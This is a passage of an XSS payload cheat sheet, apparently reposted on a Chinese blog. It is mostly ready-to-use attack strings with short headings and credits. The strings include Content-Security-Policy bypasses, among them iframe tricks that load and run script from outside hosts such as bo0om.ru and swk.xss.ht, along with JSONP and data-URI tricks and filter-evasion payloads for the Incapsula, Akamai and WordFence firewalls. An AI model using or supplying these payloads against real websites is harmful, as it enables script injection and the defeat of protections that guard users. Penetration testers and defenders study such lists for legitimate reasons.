    Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/)


    ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))


    //google.com/complete/search?client=chrome&jsonp=alert(1);


    ```js

    <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"

    ```


    ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)


    Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)


    ```js

    script=document.createElement('script');

    script.src='//bo0om.ru/csp.js';

    window.frames[0].document.head.appendChild(script);

    ```


    ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)


    ```js

    d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://swk.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)

    ```


    ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)


    Works for CSP like `script-src self`


    ```js

    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

    ```


    ## Common WAF Bypass


    ### Chrome Auditor - 9th august


    ```javascript

    </script><svg><script>alert(1)-%26apos%3B

    ```


    Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)


    ### Incapsula WAF Bypass - 8th march


    ```javascript

    anythinglr00</script><script>alert(document.domain)</script>uxldz


    anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

    ```


    ### Incapsula WAF Bypass - 11th september


    ```javascript

    <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

    ```


    ### Akamai WAF Bypass by @zseano - 18th june


    ```javascript

    ?"></script><base%20c%3D=href%3Dhttps:mysite>

    ```


    ### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october


    ```html

    <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

    ```


    ### WordFence WAF Bypass by @brutelogic - 12th september


    ```javascript

    <a href=javascript:alert(1)>

    ```


    ## More fun


    This section will be used for the "fun/interesting/useless" stuff.


    Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)

    Note : it requires user permission


    ```javascript

    Notification.requestPermission(x=>{new(Notification)(1)})

    ```


    Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)


    ## Thanks to


    - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

    - tbm

    - [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)

    - [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)

    - [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)

    - [Relative Path Overwrite - Detectify](http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite)

    - [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)

    - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)

    - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)

    - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)

    - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)

     

    参考: https://www.darknet.org.uk/2018/03/xsstrike-advanced-xss-fuzzer-exploitation-suite/

     
  • 相关阅读:
    软件工程—附加作业
    软件工程最终总结
    电梯调度(两人结对)
    VS单元测试
    第二周作业(2,3题)
    VS的安装
    补救
    漂亮男孩不说谎
    博客带我成长
    Java后缀数组-求sa数组
  • 原文地址:https://www.cnblogs.com/youyouii/p/9943464.html
Copyright © 2020-2023  润新知